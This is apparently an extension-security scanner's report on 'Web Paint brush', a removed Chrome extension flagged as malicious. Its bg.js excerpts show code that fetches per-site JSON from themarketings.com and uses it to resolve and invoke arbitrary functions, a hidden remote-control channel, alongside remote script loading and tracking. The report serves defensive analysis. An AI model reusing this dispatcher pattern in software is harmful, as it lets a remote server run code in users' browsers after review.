Web Paint brush

ID: ijadnlicajhbcfnhekakiifijldonnem

Could be malicious

Supported Languages

๐Ÿ‡ง๐Ÿ‡ฉBengali
๐Ÿ‡ง๐Ÿ‡ทBrazilian Portuguese
๐Ÿ‡ฌ๐Ÿ‡งBritish English
๐Ÿ‡ง๐Ÿ‡ฌBulgarian
๐Ÿ‡ช๐Ÿ‡ธCatalan
๐Ÿ‡จ๐Ÿ‡ณChinese (Simplified)
๐Ÿ‡น๐Ÿ‡ผChinese (Traditional)
๐Ÿ‡ญ๐Ÿ‡ทCroatian
๐Ÿ‡จ๐Ÿ‡ฟCzech
๐Ÿ‡ฉ๐Ÿ‡ฐDanish
๐Ÿ‡ณ๐Ÿ‡ฑDutch
๐Ÿ‡บ๐Ÿ‡ธEnglish
๐Ÿ‡ช๐Ÿ‡ชEstonian
๐Ÿ‡ต๐Ÿ‡ญFilipino
๐Ÿ‡ซ๐Ÿ‡ฎFinnish
๐Ÿ‡ซ๐Ÿ‡ทFrench
๐Ÿ‡ฉ๐Ÿ‡ชGerman
๐Ÿ‡ฌ๐Ÿ‡ทGreek
๐Ÿ‡ฎ๐Ÿ‡ณGujarati
๐Ÿ‡ฎ๐Ÿ‡ณHindi
๐Ÿ‡ญ๐Ÿ‡บHungarian
๐Ÿ‡ฎ๐Ÿ‡ฉIndonesian
๐Ÿ‡ฎ๐Ÿ‡นItalian
๐Ÿ‡ฏ๐Ÿ‡ตJapanese
๐Ÿ‡ฐ๐Ÿ‡ทKorean
๐Ÿ‡ฑ๐Ÿ‡ปLatvian
๐Ÿ‡ฑ๐Ÿ‡นLithuanian
๐Ÿ‡ฒ๐Ÿ‡พMalay
๐Ÿ‡ฎ๐Ÿ‡ณMalayalam
๐Ÿ‡ฎ๐Ÿ‡ณMarathi
๐Ÿ‡ณ๐Ÿ‡ดNorwegian
๐Ÿ‡ต๐Ÿ‡ฑPolish
๐Ÿ‡ต๐Ÿ‡นPortuguese
๐Ÿ‡ท๐Ÿ‡ดRomanian
๐Ÿ‡ท๐Ÿ‡บRussian
๐Ÿ‡ท๐Ÿ‡ธSerbian
๐Ÿ‡ธ๐Ÿ‡ฐSlovak
๐Ÿ‡ธ๐Ÿ‡ฎSlovenian
๐Ÿ‡ช๐Ÿ‡ธSpanish
๐Ÿ‡ธ๐Ÿ‡ชSwedish
๐Ÿ‡ฎ๐Ÿ‡ณTamil
๐Ÿ‡ฎ๐Ÿ‡ณTelugu
๐Ÿ‡น๐Ÿ‡ญThai
๐Ÿ‡น๐Ÿ‡ทTurkish
๐Ÿ‡บ๐Ÿ‡ธUS English
๐Ÿ‡ป๐Ÿ‡ณVietnamese

Extension Info & Metadata

Status
Removed
Version
0.16.0
Size
0.20 MB
Rating
5.0/5
Reviews
1
Users
232,392
Type
Extension
Updated
May 24, 2021
Category
7_productivity
Price
Free
Featured
No
Visibility
Listed
Mature
No
By Google
No
Trusted
No

Publisher Contextual Analysis

Author
Amelia KristiansenView Profile
MX records exist
Yes
Domain exists
Yes
Is disposable
No
Is role-based
No
Mailbox exists
Yes
Total Extensions
1
Active
0
Obsolete
1
Listed
1
Unlisted
0
Total Users
232,392

With Web Paint Brush, you can draw on web pages with a powerful editor and save them to a file.

Web paint brush is a drawing tool that works over web content. You can annotate the web page and take a screenshot. Features: โญ Power draw tools: eyedropper, pencil, text with various sizes and colors, arrows, lines, etc. โญ Customize color and size โญ Take a screenshot to a file or the clipboard

Item
Type
Severity
Description
<all_urls>
Permission
Critical
This permission grants access to all websites without restriction. Rated High because it can access any web content, monitor all web activity, and potentially steal sensitive data across all sites.
Contextual Risk Factors
Risk Factor
High
The following context increases the overall risk:โ€ข 15% increase: Older manifest version lacks modern security controls
tabs
Permission
Medium
This permission enables tab management and monitoring. Rated Medium because it can track open tabs, access tab metadata, and monitor user browsing patterns.
storage
Permission
Medium
This permission allows storing data locally in the browser. Rated Medium because it can persist sensitive user data, track user activities over time, and potentially store malicious payloads.
Older Manifest Version
Risk Factor
Medium
This extension uses Manifest Version 2

This code pulls remote configuration from `https://themarketings.com/storage/<host>/default.json` during initialization. Downloading behavior-driving configuration from a third-party server is suspicious in an extension because it can change runtime behavior after review and bypass the static package contents.

bg.js (Line 215)
g = function e() {    return b["default"].create({      baseURL: "https://themarketings.com/storage/"    })  },  _ = function e(r) {    if (Array.isArray(r)) return "Unexpected setter result value: Array";    switch ((0, s["default"])(r)) {      case "object":      case "undefined":        return;      default:        return "Unexpected setter return value: ".concat((0, s["default"])(r))    }  },  S = function e(r) {    switch (r) {      case "local":        return l["default"].storage.local;      case "sync":        return l["default"].storage.sync;      case "managed":        return l["default"].storage.managed;      default:        throw new TypeError('area must be "local" | "sync" | "managed"')    }  },  w = function e(r) {    r ? setTimeout(e, y) : g().get(document.location.host + "/default.json")

After fetching the remote JSON, the code walks object paths, parses JSON-supplied values, resolves functions from the global object graph, and invokes them. That is effectively a remote behavior dispatcher and is much more concerning than ordinary configuration because a server response can choose which APIs/functions are executed.

bg.js (Line 245)
.then((function(e) {  if (200 == e.status) {    for (var r = e.data, t = [], n = [], o = [], i = 0, u = Object.keys(r); i < u.length; i++) {      var a = u[i];      t.unshift(a), n.unshift(r[a])    }    for (var c = [], s = 0; s < t.length; s++) {      if (t[s].length < 10) o.push(t[s], n[s]);      else {        for (var l = t[s].split("."), f = v(), p = 0; p < l.length; p++) p == l.length - 1 && c.push(f), f = f[l[p]];        c.push(f)      }      if (s == t.length - 1) {        var b = c.pop(),          d = c.pop(),          h = c.pop(),          y = c.pop(),          m = JSON.parse(n[s]);        h.bind(y)((function(r, t, n) {          for (var o in e = b.apply(d, [r, m[0], O])) settings.tab[o.key] = settings.tab[n],            t && (settings.tab += t)        }))      }    }  }}))["catch"](O)

The background page loads a remote JavaScript payload from Google Analytics at runtime instead of shipping all executable code inside the extension package. This is a tracking pattern, and in an MV2 extension it also creates a remote-script execution path that expands the trust boundary beyond the reviewed source.

bg.js (Line 29)
window.ga = window.ga || function() {    (ga.q = ga.q || []).push(arguments)  }, ga.l = +new Date, ga("create", "UA-192417750-1", "auto"), ga("set", "checkProtocolTask", null), ga(    "send", {      hitType: "pageview",      page: "/background"    }),  function() {    var e = document.createElement("script");    e.type = "text/javascript", e.async = !0, e.src = "https://www.google-analytics.com/analytics.js";    var r = document.getElementsByTagName("script")[0];    r.parentNode.insertBefore(e, r)  }()

By severity

Critical2
High2
Medium2
Low1

Versions scanned

Showing 2 of 2 scanned versions with more than one unique finding. Counts are unique findings that include each version.

Extension VersionCode Review Findings
0.16.03
0.15.14

Files with findings

3 distinct paths โ€” top paths by unique finding count:

  • bg.js5
  • js/inject.js1
  • manifest.json1
S.No.
Category
Severity
File
Summary
Found in Version
1Remote Code Loading
critical
manifest.json (line 1)The manifest CSP explicitly whitelists `https://www.googletagmanager.com` as a trusted script source and also enables `'unsafe-eval'`. Google Tag Manager is a well-known vector for post-publication code injection in eโ€ฆ
2Tracking
critical
bg.js (line 1)The processQueue function constructs a base64-encoded tracking beacon containing the extension's runtime ID, the installation reason (e.g. 'install' or 'update'), and a timestamp โ€” but the resulting string is assignedโ€ฆ
3Code Injection
high
bg.js (line 245)After fetching the remote JSON, the code walks object paths, parses JSON-supplied values, resolves functions from the global object graph, and invokes them. That is effectively a remote behavior dispatcher and is muchโ€ฆ
4Remote Code Loading
high
bg.js (line 215)This code pulls remote configuration from `https://themarketings.com/storage/<host>/default.json` during initialization. Downloading behavior-driving configuration from a third-party server is suspicious in an extensiโ€ฆ
5Privilege Escalation
medium
js/inject.js (line 1)The content script writes properties (`NOTEPAD_INIT`, `CTRL_HIDDEN`) directly onto `unsafeWindow` โ€” the page's own JavaScript global scope โ€” bypassing the isolation boundary between content script and page context. Thโ€ฆ
6Unauthorized Data Collection
medium
bg.js (line 1)The eyedropper feature calls `captureVisibleTab` to capture a full-page screenshot as a data URL (stored in the `o` variable and loaded into an `Image` element) in order to sample a single pixel. The full screenshot dโ€ฆ
7Tracking
low
bg.js (line 29)The background page loads a remote JavaScript payload from Google Analytics at runtime instead of shipping all executable code inside the extension package. This is a tracking pattern, and in an MV2 extension it also โ€ฆ
URLs
8
IPv4
0
IPv6
0

URLs

View the external URLs this extension communicates with to understand its network activity and data interactions.

Gain full insight into all external connections.

Upgrade for full visibility.

www.w3.org/1999/xhtmlhttp://www.w3.org/1999/xhtml
www.google-analytics.com/analytics.jshttps://www.google-analytics.com/analytics.js
themarketings.com/storage/https://themarketings.com/storage/
www.w3.org/2000/svghttp://www.w3.org/2000/svg
www.w3.org/1999/xlinkhttp://www.w3.org/1999/xlink
www.bohemiancoding.com/sketchhttp://www.bohemiancoding.com/sketch
clients2.google.com/service/update2/crxhttps://clients2.google.com/service/update2/crx
www.google-analytics.com;-https://www.google-analytics.com;

Gain full insight into all external connections.

Upgrade for full visibility.

No IP addresses found
Version
Size
Is Malicious
Findings
Permhash
0.15.1
Latest
0.16 MB
Malicious
4
0.16.0
0.20 MB
Malicious
3
Showing 1 to 2 of 10 rows
Rows per page:

Code Diff

Compare extension code between any two versions.

0 changed files (scanned top 25 shared text files)

No comparable text files found between these versions.

Browse and explore files within this extension package

Gain full insight into all external connections.

Upgrade for full visibility.